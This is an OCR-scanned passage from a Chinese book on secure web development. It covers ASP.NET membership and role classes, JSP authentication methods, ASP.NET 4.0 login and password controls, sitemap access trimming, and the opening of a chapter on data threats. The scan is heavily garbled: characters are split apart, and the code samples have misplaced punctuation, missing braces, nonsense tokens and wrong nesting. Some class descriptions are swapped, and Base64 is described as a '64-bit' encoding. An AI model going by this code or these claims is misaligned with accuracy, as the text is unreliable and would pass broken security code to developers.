MembershipProvider 和 AuthorizationStoreRoleProvider 类 存储 在 Active Directory 中 ， 还 可 
以 使 用 MembershipProvider 和 RoleProvider 类 的 实现 存储 在 自 定 义 数据 源 中 。 

使 用 membership 元 素 (ASPNET 设置 架构 ) 可 以 配置 ASPNET 成 员 资格 。 
MembershipUser 类 的 提供 程序 特定 的 实现 包含 有 关 用 户 访问 页 的 信息 。 可 以 为 应 用 程序 创 
建 MembershipUser 类 的 自 定义 实现 。 

使 用 roleManager 元 素 (ASPNET 设置 架构 ) 可 以 配置 ASP.NET 角色 。ASP.NET 提 
供与 Membership 类 和 Roles 类 交互 的 服务 器 控件 。Login 、CreateUserWizard 和 
ChangePassword 控件 使 用 Membership 类 来 简化 具有 身份 验证 的 Web 应 用 程序 的 创建 ， 而 
LoginView 控件 使 用 角色 特定 的 模板 为 特定 用 户 组 自 定义 网 页 。 

更 加 清晰 的 Web 安全 空间 下 的 功能 类 ， 如 表 2-6 所 示 。 


表 2-6 权限 控制 类 
功 能 
为 Active Directory 和 Active Directory 应 用 程序 模式 服务 器 中 的 
ASP.NET 应 用 程序 管理 成 员 资 格 信 息 的 存储 
公开 和 更 新 Active Directory 数据 存储 区 中 存储 的 成 员 资 格 用 户 
信息 


类 名 称 





ActiveDirectoryMembershipProvider 











ActiveDirectoryMembershipUser 


py 


无 懈 可 击 


类 名 称 


AnonymousIdentificationEventArgs 





全 方位 构建 安全 Web 系统 


功 能 
为 AnonymousIdentification_Creating 事件 提供 数据 








AnonymousIdentificationModule 


管理 ASPNET 应 用 程序 的 匿名 标识 符 





AuthorizationStoreRoleProvider 


DefaultAuthenticationEventArgs 


在 XML 文件 中 、Active Directory 中 或 Active Directory 应 用 程序 
模式 服务 器 上 管理 ASP.NET 应 用 程序 的 角色 成 员 资格 信息 在 授 
权 管 理 器 策略 存储 区 中 的 存储 

为 DefaultAuthentication OnAuthenticate 事件 提供 数据 








DefaultAuthenticationModule 


确保 上 下 文中 存在 身份 验证 对 象 





FileAuthorizationModule 


FormsAuthentication 


FileAuthorizationModule 验证 远程 用 户 是 否 具 有 访问 所 请 求 的 文 
件 的 权限 
为 Web 应 用 程序 管理 Forms 身份 验证 服务 





FormsAuthenticationEventArgs 


为 FormsAuthentication OnAuthenticate 事件 提供 数据 





FormsAuthenticationModule 


启用 Forms 身份 验证 的 情况 下 设置 ASPNET 应 用 程序 用 户 的 标识 





FormsAuthenticationTicket 


FormsIdentity 

Membership 
MembershipCreateUserException 
MembershipPasswordException 


MembershipProvider 


MembershipProviderCollection 
MembershipUser 
MembershipUserCollection 


PassportAuthenticationEventArgs 


PassportAuthentication Module 


提供 对 票证 的 属性 和 值 的 访问 ， 这 些 票证 用 于 Forms 身份 验证 
对 用 户 进行 标识 

表示 一 个 使 用 Forms 身份 验证 进行 了 身份 验证 的 用 户 标识 
验证 用 户 凭据 并 管理 用 户 设置 

在 成 员 资格 提供 程序 未 成 功 创建 用 户 时 引发 的 异常 

无 法 从 密码 存储 区 检索 到 密码 时 引发 的 异常 

定义 ASP.NET 为 使 用 自 定义 成 员 资格 提供 程序 提供 成 员 资格 服 
务 而 实现 的 协定 

继承 自 成 员 类 

公开 和 更 新 成 员 资格 数据 存储 区 中 的 成 员 资格 用 户 信息 

继承 MembershipProvider 抽象 类 的 对 象 的 集合 
PassportAuthenticationModule 传递 到 Authenticate 事件 的 事件 参 
数 。 由 于 此 处 已 存在 一 个 标识 , 因此 这 主要 用 于 使 用 已 提供 的 标 
识 将 自 定义 IPrincipal 对 象 附加 到 上 下 文 。 提 供 围绕 Passport 身 
份 验证 服务 的 包装 
提供 由 PassportAuthenticationModule 使 用 的 类 。 它 为 应 用 程序 提 
供 了 一 种 访问 Ticket 方法 的 途径 
































PassportIdentity 表示 一 个 经 过 Passport 身份 验证 的 主体 

PassportPrincipal 表示 Passport 验证 规则 

RoleManagerEventArgs 为 RoleManagerModule 类 的 GetRoles 事件 提供 事件 数据 

RoleManagerModule 管理 当前 用 户 的 RolePrincipal 实例 

RolePrincipal 表示 当前 HITP 请 求 的 安全 信息 ， 包 括 角色 成 员 资格 

RE 定义 ASP.NET 为 使 用 自 定 义 角色 提供 程序 提供 角色 管理 服务 而 
实现 的 协定 

RoleProviderCollection 继承 RoleProvider 抽象 类 的 对 象 的 集合 

Roles 管理 角色 中 的 用 户 成 员 资格 

SqlMembershipProvider 管理 角色 中 的 用 户 成 员 资 格 ， 以 便 在 ASP.NET 应 用 程序 中 进行 
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授权 检查 
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类 名 称 功 能 
SqlRoleProvider 管理 SQL Server 数据 库 中 ASP.NET 应 用 程序 的 成 员 资格 信息 存储 
UrlAuthorizationModule 验证 用 户 具有 访问 所 请 求 的 URL 的 权限 





为 MembershipProvider 类 的 ValidatingPassword 事件 提供 事件 数据 
为 WindowsAuthentication OnAuthenticate 事件 提供 数据 

启用 Windows 身份 验证 的 情况 下 设置 ASP.NET 应 用 程序 用 户 的 
标识 

通过 Windows 组 成 员 资 格 获取 ASP.NET 应 用 程序 的 角色 信息 


ValidatePasswordEventArgs 
WindowsAuthenticationEventArgs 


WindowsAuthenticationModule 











WindowsTokenRoleProvider 
2.8 JSP 的 安全 类 


JSP 虽然 不 是 本 书 的 重点 , 但 是 它 的 相关 安全 类 也 是 可 圈 可 点 的 。 例 如 ,Authentication 
利用 通信 实体 验证 对 方 的 身份 。 资 源 访问 控制 (Access Control for Resources) 技术 可 以 对 
指定 的 用 户 组 进行 操作 ， 限 制 用 户 的 某 些 权限 。Data Integrity 可 以 保证 数据 在 传递 过 程 中 
不 被 第 三 方 修改 。 数 据 授权 技术 (Confidentiality or Data Privacy) 保证 数据 只 被 那些 授权 
使 用 的 用 户 使 用 。 

具体 这 几 种 方式 的 详细 介绍 如 下 : 


1. 安全 策略 


Declarative Security 的 内 容 包 括 角色 控制 , 完成 外 部 表单 所 要 求 的 输入 验证 。 在 网 站 运 
行 时 ，servlet 框架 使 用 这 些 策 略 强制 验证 。 


2 代码 级 安全 策略 


当 Declarative Security 不 能 够 完全 过 滤 用 户 输入 和 验证 角色 时 ， 就 可 以 使 用 代码 级 安 
全 策略 。Programmatic Security 包括 HttpServletRequest 接口 的 下 列 方法 : 

getRemoteUser 方法 返回 经 过 客户 端 验 证 的 用 户 名 。IsUserInRole 向 容器 container 的 安 
全 机 制 检 索 特 定 的 用 户 是 否 在 一 个 给 定 的 安全 角色 中 。GetUserPrinciple 方法 返回 一 个 
java.security.Pricipal 对 象 。 这 些 APIs 根据 远程 用 户 的 逻辑 角色 让 servlet 去 完成 一 些 逻 辑 判 
断 。 它 也 可 以 让 servlet 去 决定 当前 用 户 的 权限 。 如 果 getRemoteUser 返回 null 值 ( 这 意味 
着 没有 用 户 被 验证 ) ， 那 么 isUserInRole 就 总 会 返回 false，getUserPrinciple 总 会 返回 null。 


3. 角色 


角色 (Roles) 是 由 开发 和 维护 人 员 所 定义 的 一 个 抽象 的 逻辑 用 户 组 。 当 一 个 网 站 系统 
被 发 布 ，Deployer 就 把 这 些 角 色 映 射 到 安全 认证 ， 例 如 组 或 规则 。 

当 Deployer 把 一 个 安全 角色 映射 为 操作 环境 下 的 一 个 用 户 组 , 调用 安全 策略 所 属 的 用 
户 组 就 从 安全 属性 中 获得 。 如 果 安 全 策略 的 用 户 组 与 在 操作 环境 下 的 用 户 组 相 匹 配 ， 那 么 
安全 策略 就 是 一 个 安全 角色 。 当 Deployer 把 一 个 安全 角色 映射 为 一 个 在 安全 域 中 的 安全 策 
略 名 时 ， 调 用 安全 策略 就 把 角色 从 安全 属性 中 提取 出 来 。 如 果 两 者 相同 的 话 ， 调 用 的 安 



























































。29 。 


无 懈 可 击 





全 方位 构建 安全 Web 系统 


全 策略 就 是 安全 的 。 


4. Authentication 


JSP 的 WEB 系统 能 够 利用 下 列 的 认证 机 制 验证 一 个 用 户 。 
(1) HTTP Digest Authentication 。 

(2) HTTPS Client Authentication。 

(3) HTTP Basic Authentication。 

(4) HTTP Based Authentication。 


5. HTTP Basic Authentication 


HTTP Basic Authentication 是 一 个 定义 在 HITP/1.1 规范 中 的 验证 机 制 。 这 种 机 制 是 以 
用 户 名 和 密码 为 基础 的 。 一 个 JSP 系统 要 求 一 个 Web Client 去 验证 一 个 用 户 。 作 为 请 求 的 
一 部 分 ， Web Server 传递 realm 的 字符 串 , 用 户 的 验证 信息 就 包含 在 字符 串 中 。Web Client 
得 到 这 些 用 户 名 和 密码 ， 然 后 把 它 传递 给 Web Server。 然 后 Web server 验证 这 些 用 户 。 

由 于 密码 是 使 用 64 位 的 弱 编 码 来 传递 的 , 所 以 Basic Authentication 不 是 一 种 安全 的 验 
证 协议 。 假 如 增加 (HTTPS) 或 在 网 络 层 使 用 安全 措施 就 能 弥补 这 些 不 足 。 


6. HTTP Digest Authentication 


与 HITP Digest Authentication 一 样 ，HTTP Digest Authentication 根据 用 户 名 和 密码 验 
证 一 个 用 户 。 密 码 的 传输 是 通过 一 种 加 密 的 形式 进行 的 ， 这 就 比 Basic Authentication 所 使 
用 的 64 位 编码 形式 传递 要 安全 得 多 。 但 这 种 方法 还 是 没有 HTTPS 安全 。 


7. HTTPS Client Authentication 


使 用 HTTPS (HTTP over SSL) 的 用 户 验 证 是 一 种 严格 验证 机 制 。 这 种 机 制 要 求 用 户 
客户 端 处 理 公共 密 钥 (Public Key Certification，PKC) 。 
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本 章 主要 介绍 在 .NET 框架 下 开发 Web 应 用 时 必须 用 到 的 安全 控件 ， 这 些 控件 与 安全 
代码 一 起 构成 了 安全 单 。 对 于 用 户 来 说 ， 这 些 控件 是 系统 界面 所 必须 的 元 素 。 对 于 开发 人 
员 来 说 ， 正 确 并 有 效 地 使 用 安全 控件 能 够 迅速 的 构建 最 基本 的 安全 体系 。 

安全 控件 实质 上 是 一 种 程序 ， 可 以 依据 Web 应 用 的 需要 进行 编写 。 目 前 ， 安 全 控件 主 
要 应 用 于 银行 的 网 银 及 网 络 交易 平台 , 用 来 保护 用 户 的 账号 和 密码 等 信息 , 避免 经 济 损失 。 

安全 控件 在 用 户 登 录 时 发 挥 作用 ， 通 过 它 对 关键 数据 进行 SSL 加 密 ， 防 止 账号 密码 被 
木马 程序 或 病毒 窃取 ， 有 效 防 止 木马 窃取 键盘 记录 。 从 用 户 的 登录 到 注销 ， 安 全 控件 可 以 
实时 对 应 用 程序 及 客户 端 进行 监控 。 目 前 ， 用 安全 控件 来 保护 客户 的 账号 及 密码 是 非常 安 
全 的 。 

ASP.NET 的 安全 控件 主要 包括 登录 控件 、 登 录 状 态 控件 、 密 码 恢复 控件 、 密 码 修改 控 
件 和 创建 用 户 向 导 控 件 。 这 些 控件 与 NET 3.5/4 的 membership、Role Manager 等 用 户 管 理 
技术 配合 使 用 。 

目前 ASPNET 版 本 中 包含 membership API， 能 够 绑 定 诸多 安全 控件 。 这 种 绑 定 结构 
允许 使 用 成 员 管理 技术 来 控制 各 类 安全 控件 的 属性 。 在 常规 的 Web 应 用 开发 中 , 使 用 最 频 
繁 的 就 是 用 户 登 录 、 用 户 注册 和 密码 管理 控件 。 


3.1 登录 控件 


登录 控件 为 站 点 的 基于 认证 和 授权 的 UI (如 登录 窗 体 、 创 建 用 户 窗 体 、 密 码 取 回 、 已 
登录 用 户 或 角色 的 定制 UI) 提供 了 基本 模块 。 这 些 控件 利用 ASP.NET 中 内 建 的 成 员 和 角 
色 服 务 与 站 点 所 定义 的 用 户 和 角色 信息 交互 操作 。 用 户 点 击 登录 按钮 后 ， 控 件 调 用 
membership 验证 用 户 的 任 证 。 假 如 用 户 的 身份 凭证 有 效 ， 则 利用 窗 体验 证 方法 
SetAuthCookie 保存 用 户 的 登录 数据 。 

登录 控件 的 设计 状态 如 图 3-1 所 示 。 











图 3-1 登录 控件 


无 懈 可 击 一 一 全 方位 构建 安全 Web 系统 


登录 控件 的 基本 配置 结构 包括 创建 用 户 属性 、 创 建 用 户 页 面 属性 、 恢 复 密码 属性 和 显 
示 保 存 状 态 属性 。 
其 HIML 代码 如 下 : 


<asp:Login runat="server" ID="login" 
CreateUserText="New User?" 
CreateUserUrl="~/register.aspx" 
PasswordRecoveryText="Forgot Password?" 
PasswordRecoveryUrl="~/Password.aspx" 
DisplayRememberMe="false" /> 


开发 人 员 除 了 可 以 用 这 个 安全 控件 自动 生成 和 执行 用 户 操作 外 ， 也 可 以 自 定义 它们 的 
表现 形式 。 在 用 户 认 证 前 后 ， 利 用 认证 事件 AuthenticateEventArgs 输出 想 要 的 认证 结果 。 
值得 一 提 的 是 ， 该 控件 还 能 够 根据 开发 人 员 的 配置 ， 显 示 验 证 过 程 当 中 的 各 类 错误 。 

下 面 的 实例 演示 如 何 自 定义 认证 事件 EventAuthenticate， 该 事件 根据 验证 结果 获取 不 
同 的 验证 参数 ， 实 例 代码 如 下 : 


<$%@ Page Language="C#" $%> 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.o0org/TR/xhtml1/DTD/xhtmll-transitional.dtd"> 
<script runat="server"> 

protected void EventAuthenticate(object sender, 
AuthenticateEventArgs e) 

{ 

// 验证 用 户 凭证 

if (ValidateUser (login.UserName, login.Password)) 
e.Authenticated = true: 

else 

e.Authenticated = false: 

<XSEFEJBE> 

<html] xmlns="http://www.w3.-org/1999/xhtml" > 

<head runat="server"> 


<title>Login</title> 

</head> 

<body> 

<form id="forml" runat="server"> 
<div> 


<asp:Login runat="server" ID="1ogin" 
OnAuthenticate=" EventAuthenticate " /> 

</div> 

</form> 

</body> 

</html> 


3.2 登录 状态 控件 
登录 状态 控件 分 为 两 个 部 分 , 分 别 是 用 来 显示 用 户 名 称 的 控件 LoginName 和 用 来 显示 


登录 状态 的 控件 LoginStatus。 


1. 用 户 名 显示 控件 LoginName 





在 日 常 开发 中 ， 开 发 人 员 经 常 使 用 类 似 Session["usemame"] 或 Context.User Identity 
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Name 的 方式 直接 显示 用 户 名 ， 这 种 方式 是 比较 烦琐 和 不 安全 的 。 类 似 操作 很 容易 被 黑 
从 客户 端 内 存 中 提取 ， 而 使 用 LoginName 则 可 以 有 效 防止 这 种 情况 的 发 生 。 
嵌入 页 面 的 具体 代码 如 下 : 


"你 好 " <asp:LoginName runat="server"” ID=" loginName"” />， 欢 迎 归来 ! 














2. 登录 状态 显示 控件 LoginStatus 


LoginStatus 控件 则 用 来 检测 用 户 被 授权 的 情况 ,假如 用 户 没 有 通过 验证 则 显示 要 求 登 
录 链 接 ， 反 之 则 显示 允许 注销 链接 。 

下 面 的 实例 说 明了 如 何 使 用 LoginStatus 控件 检测 用 户 的 安全 状态 。 该 实例 通过 上 下 文 
对 象 获取 验证 状态 ， 使 用 站 语句 来 判定 ContextUser .Identity。 假 如 用 户 需 要 注销 窗 体验 证 
状态 ， 可 以 调用 票据 注销 方法 FormsAuthentication.SignOut。 具 体 步 又 如 下 

(1) 在 web.config 配置 验证 类 型 及 信息 : 


<authentication mode="Forms"> 
<forms name="landrise aspnet" path="/" loginUrl="~/Login.aspx" 
timeout="20" 
defaultUrl="~/Default .aspx"/> 


(2) 配置 HTML 页 面 : 


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtmll-transitional.dtd"> 
<html > 
<head> 
<title>ASP.NET Example</title> 
</head> 
<body> 
< asp:LoginStatus ID="Loginstatusl" runat="server" 
onloggingout="LoginStatus1l LoggingOut" /> 
</form> 
</body> 
</html> 
</authentication> 


(3) 实现 登录 状态 的 验证 : 
If (!Request.IsAuthenticated)// 判断 是 事 登 录 


// 未 登录 转 到 登录 页 面 


FormsAuthentication.RedirectToLoginPage() 


} 
(4) 在 登录 页 面 注销 当前 登录 用 户 : 
Protected void LoginStatus1l LoggingOut (object sender, LoginCancelEvent 
Args e) 
{ 
if (通过 账号 密码 验证 ) 
{ 
// username 用 户 识 标 
// createPersistentCookie 是 否 记 住 , 如 果 为 true, 下 次 直接 进入 系统 


FormsAuthentication.Signout() :// 退出 登录 
FormsAuthentication.SetAuthCookie (username, createPersistent 
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Cookie): 

// 转 到 returnurl 或 配置 的 默认 页 
FormsAuthentication.RedirectFromLoginPage (username, 
createPersistentCookie): 


3.3 ”密码 维护 控件 


密码 维护 控件 分 为 两 部 分 ， 分 别 是 密码 修复 控件 PasswordRecovery 和 密码 修改 控件 
ChangePassword 。 


1. 密码 修复 控件 


密码 修复 控件 用 来 实现 用 户 密码 的 重 置 和 履 盖 ， 在 密码 的 重 置 过 程 中 通过 秘密 问答 的 
方式 核对 用 户 权限 。 该 控件 在 实际 使 用 过 程 中 往往 被 很 多 开发 人 员 误 解 ， 导 致 明文 形式 存 
储 密码 ， 这 是 非常 不 安全 的 。 

正确 的 做 法 是 ， 利 用 ASP.NET 不 可 逆 的 加 密 方案 对 密码 进行 哈 希 处 理 ， 然 后 将 新 密 
码 发 送 给 用 户 。 如 果 成 员 资 格 的 授予 程序 经 过 配置 ， 则 可 以 对 密码 进行 加 密 存储 并 发 送 。 

若 要 使 密码 方案 正确 运行 , 应 用 程序 应 提供 用 户 发 送 电子 邮件 的 功能 , 可 以 使 用 SMTP 
服务 器 的 名 称 对 应 用 程序 进行 配置 。 

这 里 通过 一 个 实例 说 明 密 码 修复 控件 该 如 何 使 用 。 假 设 匿名 用 户 访 问 密码 修复 页 
RecoverPassword.aspx， 在 输入 新 密码 后 显示 成 功 画 面 ， 运 行 效果 如 图 3-2 所 示 。 


是 天 忘记 了 您 的 密码 ? 
要 接收 您 的 密码 ， 请 输入 您 的 用 户 名 。 
用 户 名 :| 水 


pe 


提交 
Need help? 





图 3-2 密码 修复 控件 运行 效果 


在 代码 实例 中 定义 了 用 户 锁定 事件 _UserLookupError 和 初始 化 事件 _ Load, 它们 提供 不 
同情 况 下 要 显示 的 提示 信息 。 

如 果 需 要 将 修复 的 密码 通过 电子 邮件 的 形式 发 送 给 用 户 ， 必 须 设置 控件 的 邮件 配置 节 
<mailSettings>。 该 模块 用 来 设置 往来 邮件 的 地 址 和 发 送 服务 器 地 址 。 

对 于 用 户 输入 正确 的 情况 ， 密 码 修复 控件 调用 成 功 模板 <successtemplate>。 

具体 实现 代码 如 下 : 


<%@ Page Language="C#" $> 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" “http:// 





。34 。 


第 3 章 ASP.NET 4.0 的 安全 组 件 


www-wW3 .org/TR/xhtml11/VDTD/Vxhtm11-transitional.dtd"> 
<script runat="server"> 
// 设置 未 发 现 用 户 提示 
void PasswordRecoveryl] UserLookupError (object sender, System.EventArgs e) 
{ 
PasswordRecoveryl .LabelStyle.ForeColor = System.Drawing.Color.Red: 
} 
// 重 置 提示 
void PasswordRecoveryl Load(object sender, System.EventArgs e) 
{ 
PasswordRecoveryl.LabelStyle.ForeColor = System.Drawing.Color. 
Black: 
上 
</script> 
<html > 
<head runat="server"> 
<title>ASP.NET Example</title> 
</head> 
<body> 
<form id="forml" runat="server"> 
<asp:PasswordRecovery id="PasswordRecoveryl" runat="server" BorderStyle= 
"Solid" 
BorderWidth="1lpx" BackColor="#F7F7DE" 
Font-Size="10pt" Font-Names="Verdana" BorderColor="#CCCC99" 
HelpPageText="Need 
help?" HelpPageUrl="recoveryHelp.aspx" 
onuserlookuperror="PasswordRecoveryl UserLookupError" 
onload="PasswordRecoveryl Load" 
MailDefinition-From="admin@company.com > 


<successtemplate> 
<table border="0" style="font-size:10pt:"> 
<tr> 
<td>Your password has been sent to you.</td></tr> 
</table> 


</successtemplate> 
<titletextstyle font-bold="True" forecolor="White" backcolor= 
"#6B696B"> 
</titletextstyle> 
</asp:PasswordRecovery> 
</form> 
</body> 
</html> 


2. 密码 修改 控件 ChangePassword 


出 于 对 系统 安全 的 考虑 , 开发 人 员 通 常 都 会 设计 密码 修改 功能 , 但 容易 忽略 很 多 细节 ， 
例如 ， 敏 感 数据 的 过 滤 、 注入 符号 的 替换 等 。 

通过 ChangePassword 控件 ， 用 户 可 以 修改 自己 的 密码 : 先 提供 原始 密码 ， 然 后 再 创建 
并 确认 新 密码 。 如 果 原 始 密 码 正 确 ， 则 用 户 密码 将 更 改 为 新 密码， 该 控件 支持 邮件 发 送 新 

如 果 用 户 未 通过 身份 验证 , 该 控件 将 跳 回 到 用 户 登 录 页 面 。 如 果 用 户 已 通过 身份 验证 ， 
该 控件 将 以 用 户 的 登录 名 填充 文本 框 ， 运 行 效果 如 图 3-3 所 示 。 

密码 修改 过 程 面临 的 最 大 安全 问题 就 是 密码 信息 的 处 理 ， 下 面 的 实例 将 演示 如 何 配 置 
控件 的 数据 限制 功能 。 实 例 演示 设置 了 NewPasswordRegularExpression 属性 ， 定 义 检查 密 
码 的 正则 表达 式 ， 确 保密 码 满足 4 个 条 件 : 
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asp;changepassword#ChangePassword1| 





| <] changePassword 任务 

















确认 新 密码 | + 
“确认 新 密码 与 -新 密码 项 必须 匹配 。 
更 改 密码 | 取消 | 

















图 3-3 密码 修改 控件 


(1) 多 于 6 个 字符 。 

(2) 至 少 包含 一 个 数字 。 

(3) 至 少 包含 一 个 特殊 字符 〈 非 字母 、 数 字 或 字符 ) 。 

(4) PasswordHintText 属性 中 包含 的 密码 要 求 会 显示 给 用 户 。 

假如 用 户 输入 的 密码 不 符合 NewPasswordRegularExpression 属性 的 要 求 ， 则 向 用 户 显 
示 NewPasswordRegularExpressionErrorMessage 属性 中 包含 的 文本 。 如 果 用 户 未 输入 新 密 
码 ， 则 向 用 户 显 示 NewPasswordRequiredErrorMessage 属性 中 包含 的 文本 。 

HTML 代码 如 下 : 

<$%@ page language="C#"$> 

<!DOCTYPE html PUBLIC "“-//W3C//DTD XHTML 1.0 Transitional//EN" 

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 

<script runat="server"> 

</ script> 

<html > 


<head runat="server"> 
<title>Change Password with Validation</title> 


</head> 
<body> 
<form id="forml" runat="server"> 
<div> 
<asp:changepassword id="ChangePassword" runat="server" 
PasswordHintText = 


"Please enter a password at least 7 characters long, 
containing a number and one special character." 
NewPasswordRegularExpression = 
ON (NL 
NewPasswordRegularExpressionErrorMessage = 
"Error: Your password must be at least 7 characters long, 
and contain at least one number and one special character." > 
</asp:changepassword> 
</div> 
</form> 
</body> 
</html> 


3.4 创建 用 户 向 导 控 件 


创建 用 户 向 导 控件 CreateUserWizard 用 来 自动 创建 新 的 账户 ， 避 免 开 发 人 员 创建 不 安 
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全 的 用 户 注册 功能 。 创 建 用 户 向 导 控 件 的 设计 界面 如 图 3-4 所 示 。 



































[spireateuser Ward# reateLserWiz...| 
注册 新 账户 
用 户 名 : 
密码 |  *| 振 [EsaP EE 
确认 密码 [三 ” ”x*| | 淹 n 称 除 Wizardsteps- 
aa 转 搁 为 StartNavigationTemplate 
电子 邮件 ER 转 搁 为 StepNavigationTemplate 
安全 提示 问题 * | | 转换 为 FinishNavigationTemplate 
安全 答案 : x*| | 转 接 为 CustomNavigationTemplate 
“密码 "和 "确认 密码 "必须 匹配 。 自 定义 创建 用 户 步 村 
自 定义 完成 步 票 
创建 用 户 管理 网 站 
0 0 
编辑 模板 


图 3-4 创建 用 户 向 导 控 件 


使 用 CreateUserWizard 控件 分 为 两 个 步骤 : “注册 新 账户 ”和 “完成 ”。“ 注 册 新 账 
户 ” 步 骤 (在 “CreateUserWizard 任务 ”菜单 中 也 称 为 “创建 用 户 ” 步 又 ) 允许 用 户 输入 
创建 账户 所 需 的 信息 ，“ 完 成 ”步骤 用 于 确认 账户 已 创建 。 

创建 用 户 向 导 控 件 的 实例 教会 读者 如 何 快速 创建 新 用 户 ， 而 不 必 自 行 开 发 注册 页 面 。 
创建 用 户 需 要 调用 创建 事件 CreateUserWizard1_CreatedUser， 该 事件 执行 membership 体系 
的 创建 用 户 方法 Profile.SetPropertyValue。 

需要 注意 的 是 , 该 控件 唯一 的 安全 性 缺陷 就 是 输入 文本 框 , 这 是 一 个 潜在 的 安全 威胁 。 
默认 情况 下 网 页 验证 输入 并 不 包括 脚本 或 HTML 元 素 。 因 此 , 为 了 防止 黑客 通过 输入 SQL 
语句 或 非法 符号 执行 可 怕 的 操作 ,需要 加 工 该 控件 的 输入 框 ,通常 的 解决 方法 是 采用 Server. 
HtmlEncode (textbox.Text) 将 HTML 字符 转化 。 

创建 用 户 向 导 控件 的 HTML 代码 如 下 : 


<%@ page language="C#"%$> 
<!DOCTYPE html]l PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtmll-transitional.dtd"> 
<script runat="server"> 
void CreateUserWizardl CreatedUser (object sender, EventArgs e) 
Fristname=Server.HtmlEncode (textbox.Text): 
Lastname=Server.HtmlEncode (lastName.Text): 
Profile.SetPropertyValue ("userName", Fristname + " " + Lastname): 
了 
</scripE> 
<html > 
<head runat="server"> 
<title> 
CreateUserWizard.CreatedUser sample</title> 
</head> 
<body> 
<form id="forml" runat="server"> 
<div> 
<asp:createuserwizard id="CreateUserWizardl1" 
oncreateduser="CreateUserWizard]1 CreatedUser" 
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runat="server"> 
<wizardsteps> 
<asp:wizardstep runat="server" steptype="Start" title= 
"Identification"> 
Tell us your name:<br /> 
<table width="100%"> 
SEE 
<td> 
First name:</td> 
<td> 
<asp:textbox id="firstName" runat="server" /></td> 
< Er> 
< 了 之 
<td> 
Last name:</td> 
<td> 
<asp:textbox id="lastName" runat="server" /></td> 
< /Er 
</table> 
</asp:wizardstep> 
<asp:createuserwizardstep runat="server" title=" 创 建新 的 用 户 "> 
</asp:createuserwizardstep> 
</wizardsteps> 
</asp:createuserwizard> 
</div> 
</form> 
</body> 
</html> 


3.5 页 面 访 问 控件 


开发 人 员 都 是 通过 配置 Web 服务 器 权限 或 代码 来 控制 页 面 的 访问 权限 , 这 样 既 耗 时 也 
耗 力 ， 并 且 不 够 安全 。 

Web 应 用 系统 地 图 安全 控件 siteMap 可 以 实现 分 级 保护 页 面 ， 只 允许 某 些 成 员 或 其 他 
经 过 身份 验证 的 用 户 浏览 。ASP.NET 的 角色 管理 可 以 基于 安全 角色 限制 对 Web 文件 的 访 
问 ， 控 件 如 图 3-5 所 示 。 
asp:sitemappath#SiteMapPathl ps 
SiteMappathl - RootNodeTemplate “1 siteMapPath 任务 
| 模 可 六 所 坑 

[ER 

结 更 模板 编辑 








RootNodeTemplate 




















图 3-5 siteMap 控件 








可 以 看 到 ， 若 要 在 导航 界面 中 隐藏 “支持 ”链接 ， 需 要 在 Web.config 文件 中 配置 站 点 
地 图 提供 程序 ， 以 启用 安全 性 调整 。 应 用 程序 使 用 ASP.NET 的 URL 授权 和 文件 授权 来 隐 
藏 指向 “支持 ”页 面 的 链接 。ASP.NET 4.0 以 上 版 本 中 包含 的 XmlSiteMapProvider 控件 使 
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用 URL 授权 和 文件 授权 功能 ， 对 站 点 地 图 中 的 每 个 节点 自动 执行 授权 检查 。 

下 面 的 实例 演示 了 如 何 限制 页 面 test.aspx 的 访问 权限 ， 拒 绝 不 属于 “客户 ”角色 的 成 
员 访 问 者 查看 该 网 页 。 

该 实例 首先 完成 对 Web.config 的 配置 ， 使 用 roles 属性 扩展 对 站 点 地 图 节点 的 访问 ， 
使 其 监控 URL 授权 和 文件 授权 所 准许 的 访问 级 别 。 

配置 节 代 码 如 下 : 


<?xml version="1.0" encoding="utf-8" ?> 
<siteMap> 
<!-- other <siteMapNode> elements --> 
<siteMapNode title="Support" description="Support" 
url="~/Customers/Support .aspx" roles="Customers" /> 
</siteMap> 


然后 ， 将 “测试 ”页 面 的 roles 属性 设置 为 Customers。 根 据 URL 授权 和 文件 授权 允许 
属于 “客户 ”角色 的 用 户 查 看 实际 的 “测试 ”页 面 文件 。 


<system.web> 


<!-- .other configuration settings --> 
<siteMap defaultProvider="XmlSiteMapProvider" enabled="true"> 
<providers> 


<add name="XmlSiteMapProvider" 
description="Default SiteMap provider." 
type="System.Web.XmlSiteMapProvider " 
siteMapFile="Web.sitemap" 
securityTrimmingEnabled="true" /> 
</providers> 
</siteMap> 
</system.web> 
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大 多 数 情况 下 , 开发 人 员 并 不 善于 处 理 Web 应 用 系统 的 敏感 数据 ,而 这 些 数据 一 旦 被 
黑客 拿 到 就 会 产生 极 大 的 隐患 。 

本 章 将 讲解 保护 系统 中 的 重要 数据 的 两 种 技术 : 加 密 技术 和 保护 技术 。 加 密 技术 中 主 
要 介绍 哈 希 加 密 技 术 和 配置 信息 加 密 技术 ， 保 护 技术 主要 介绍 视图 保护 技术 和 数据 保护 技 
术 。 在 介绍 数据 加 密 技 术 之 前 ， 先 看 一 下 数据 到 底面 临 哪些 安全 威胁 。 





4.1 对 数据 的 攻击 方式 


当今 的 各 类 Web 系统 中 ,最 需要 被 重视 的 就 是 敏感 数据 ， 主 要 包括 各 种 个 人 资料 ， 如 
个 人 地 址 、 电 话 号 码 、 重 要 记录 、 支 付 卡 密码 等 。 这 些 敏感 数据 虽然 保存 方式 各 有 不 同 ， 
如 可 以 保存 在 数据 库 、 数 据 文件 、 配 置 文件 中 等 ， 文 件 传输 方法 多 种 多 样 ， 应 用 的 协议 也 
不 尽 相 同 ， 但 是 如 何 保证 传输 和 保存 过 程 的 安全 是 敏感 数据 所 共同 面临 的 问题 。 

敏感 数据 面临 的 安全 威胁 主要 有 以 下 两 点 : 


1. 数据 泄露 


一 些 高 级 别 的 敏感 数据 ， 如 信用 卡 密码 、 联 系 方式 ， 都 应 该 尽量 缩小 其 使 用 范围 。 这 
些 数 据 被 泄露 的 情况 很 多 ， 因 此 要 特别 注意 数据 的 传输 方式 ， 不 要 在 互联 网 上 通过 未 加 密 
的 协议 进行 传输 ， 如 HTTP 或 UDP 等 非 安全 链接 的 协议 。 


2. 数据 嗅 探 


